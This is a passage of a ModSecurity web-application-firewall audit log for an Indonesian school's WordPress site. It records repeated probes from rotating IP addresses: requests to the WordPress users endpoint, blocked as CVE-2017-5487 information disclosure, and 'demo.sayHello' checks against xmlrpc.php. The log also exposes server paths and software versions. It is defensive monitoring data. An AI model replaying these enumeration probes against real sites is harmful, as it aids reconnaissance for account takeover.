OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --10fa6405-Z-- --c9ff8649-A-- [17/May/2025:07:59:03 +0700] aCffV3yxdQCiyU1ENFcncgAAABg 103.236.140.4 43256 103.236.140.4 8181 --c9ff8649-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.82.254 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.82.254 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --c9ff8649-C-- demo.sayHello --c9ff8649-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --c9ff8649-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747443543084960 5965 (- - -) Stopwatch2: 1747443543084960 5965; combined=4228, p1=637, p2=3395, p3=34, p4=38, p5=75, sr=85, sw=49, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c9ff8649-Z-- --1997ec71-A-- [17/May/2025:07:59:51 +0700] aCffhxKi5m5upc8uMd6h4QAAAMg 103.236.140.4 43260 103.236.140.4 8181 --1997ec71-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.171.169 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.171.169 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --1997ec71-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1997ec71-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747443591447260 2873 (- - -) Stopwatch2: 1747443591447260 2873; combined=1159, p1=397, p2=736, p3=0, p4=0, p5=26, sr=61, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1997ec71-Z-- --0c9cfe72-A-- [17/May/2025:07:59:57 +0700] aCffjXyxdQCiyU1ENFcndAAAABc 103.236.140.4 43264 103.236.140.4 8181 --0c9cfe72-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.171.169 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.171.169 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --0c9cfe72-C-- demo.sayHello --0c9cfe72-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --0c9cfe72-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747443597828360 6635 (- - -) Stopwatch2: 1747443597828360 6635; combined=4799, p1=620, p2=3936, p3=39, p4=44, p5=96, sr=80, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0c9cfe72-Z-- --71db4e68-A-- [17/May/2025:08:00:28 +0700] aCffrBKi5m5upc8uMd6h4wAAAMo 103.236.140.4 43304 103.236.140.4 8181 --71db4e68-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.43.214 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.43.214 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --71db4e68-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --71db4e68-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747443628230601 2591 (- - -) Stopwatch2: 1747443628230601 2591; combined=1317, p1=405, p2=877, p3=0, p4=0, p5=35, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --71db4e68-Z-- --cb749c49-A-- [17/May/2025:08:00:34 +0700] aCffsnyxdQCiyU1ENFcndwAAAAY 103.236.140.4 43314 103.236.140.4 8181 --cb749c49-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.43.214 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.43.214 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --cb749c49-C-- demo.sayHello --cb749c49-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --cb749c49-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747443634852241 5193 (- - -) Stopwatch2: 1747443634852241 5193; combined=4037, p1=468, p2=3347, p3=34, p4=35, p5=91, sr=70, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cb749c49-Z-- --555b9408-A-- [17/May/2025:08:01:59 +0700] aCfgBwTOsBn9MSWb6WJuLwAAAJE 103.236.140.4 43418 103.236.140.4 8181 --555b9408-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.32.113 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.32.113 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --555b9408-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --555b9408-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747443719310298 2990 (- - -) Stopwatch2: 1747443719310298 2990; combined=1419, p1=455, p2=934, p3=0, p4=0, p5=30, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --555b9408-Z-- --8550d00b-A-- [17/May/2025:08:02:08 +0700] aCfgEATOsBn9MSWb6WJuNwAAAIE 103.236.140.4 43436 103.236.140.4 8181 --8550d00b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.32.113 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.32.113 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --8550d00b-C-- demo.sayHello --8550d00b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --8550d00b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747443728394172 5939 (- - -) Stopwatch2: 1747443728394172 5939; combined=4843, p1=562, p2=4036, p3=40, p4=43, p5=97, sr=77, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8550d00b-Z-- --bd80eb5c-A-- [17/May/2025:08:03:28 +0700] aCfgYBKi5m5upc8uMd6h6gAAANI 103.236.140.4 43542 103.236.140.4 8181 --bd80eb5c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.204.43 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.204.43 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --bd80eb5c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bd80eb5c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747443808828001 2516 (- - -) Stopwatch2: 1747443808828001 2516; combined=1479, p1=476, p2=960, p3=0, p4=0, p5=43, sr=103, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bd80eb5c-Z-- --2d87af59-A-- [17/May/2025:08:03:37 +0700] aCfgaRKi5m5upc8uMd6h7wAAANc 103.236.140.4 43554 103.236.140.4 8181 --2d87af59-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.204.43 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.204.43 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --2d87af59-C-- demo.sayHello --2d87af59-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --2d87af59-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747443817312305 5468 (- - -) Stopwatch2: 1747443817312305 5468; combined=4287, p1=490, p2=3570, p3=30, p4=34, p5=96, sr=74, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2d87af59-Z-- --900c7f0f-A-- [17/May/2025:08:03:43 +0700] aCfgbxKi5m5upc8uMd6h9AAAAMQ 103.236.140.4 43566 103.236.140.4 8181 --900c7f0f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.89.206 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.89.206 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --900c7f0f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --900c7f0f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747443823506235 3316 (- - -) Stopwatch2: 1747443823506235 3316; combined=1421, p1=473, p2=905, p3=0, p4=0, p5=42, sr=78, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --900c7f0f-Z-- --a5803a2b-A-- [17/May/2025:08:03:48 +0700] aCfgdBKi5m5upc8uMd6h9wAAAMY 103.236.140.4 43574 103.236.140.4 8181 --a5803a2b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.89.206 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.89.206 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a5803a2b-C-- demo.sayHello --a5803a2b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a5803a2b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747443828039244 5951 (- - -) Stopwatch2: 1747443828039244 5951; combined=4355, p1=550, p2=3581, p3=32, p4=37, p5=92, sr=77, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a5803a2b-Z-- --4927e372-A-- [17/May/2025:08:04:07 +0700] aCfghwTOsBn9MSWb6WJuZwAAAIE 103.236.140.4 43600 103.236.140.4 8181 --4927e372-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 12.27.99.162 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 12.27.99.162 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --4927e372-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4927e372-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747443847138959 2581 (- - -) Stopwatch2: 1747443847138959 2581; combined=1475, p1=483, p2=959, p3=0, p4=0, p5=33, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4927e372-Z-- --ff00f127-A-- [17/May/2025:08:04:32 +0700] aCfgoATOsBn9MSWb6WJuaAAAAIA 103.236.140.4 43620 103.236.140.4 8181 --ff00f127-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.37.188 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.37.188 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --ff00f127-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ff00f127-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747443872356114 3248 (- - -) Stopwatch2: 1747443872356114 3248; combined=1431, p1=501, p2=898, p3=0, p4=0, p5=31, sr=82, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ff00f127-Z-- --582d1609-A-- [17/May/2025:08:04:39 +0700] aCfgpwTOsBn9MSWb6WJuagAAAIQ 103.236.140.4 43624 103.236.140.4 8181 --582d1609-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.37.188 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.37.188 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --582d1609-C-- demo.sayHello --582d1609-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --582d1609-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747443879407905 4574 (- - -) Stopwatch2: 1747443879407905 4574; combined=3596, p1=447, p2=2950, p3=23, p4=25, p5=89, sr=66, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --582d1609-Z-- --fc8afb3a-A-- [17/May/2025:08:09:04 +0700] aCfhsHyxdQCiyU1ENFcneQAAAAk 103.236.140.4 43648 103.236.140.4 8181 --fc8afb3a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.172.122 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.172.122 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --fc8afb3a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fc8afb3a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747444144500450 2418 (- - -) Stopwatch2: 1747444144500450 2418; combined=1025, p1=356, p2=644, p3=0, p4=0, p5=24, sr=59, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fc8afb3a-Z-- --44231a1a-A-- [17/May/2025:08:09:11 +0700] aCfhtwTOsBn9MSWb6WJucgAAAJA 103.236.140.4 43652 103.236.140.4 8181 --44231a1a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.172.122 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.172.122 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --44231a1a-C-- demo.sayHello --44231a1a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --44231a1a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747444151511900 5808 (- - -) Stopwatch2: 1747444151511900 5808; combined=4271, p1=549, p2=3440, p3=32, p4=35, p5=122, sr=76, sw=93, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --44231a1a-Z-- --f6b7b031-A-- [17/May/2025:08:10:14 +0700] aCfh9nyxdQCiyU1ENFcnegAAAAo 103.236.140.4 43658 103.236.140.4 8181 --f6b7b031-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.181.247 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.181.247 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f6b7b031-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f6b7b031-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 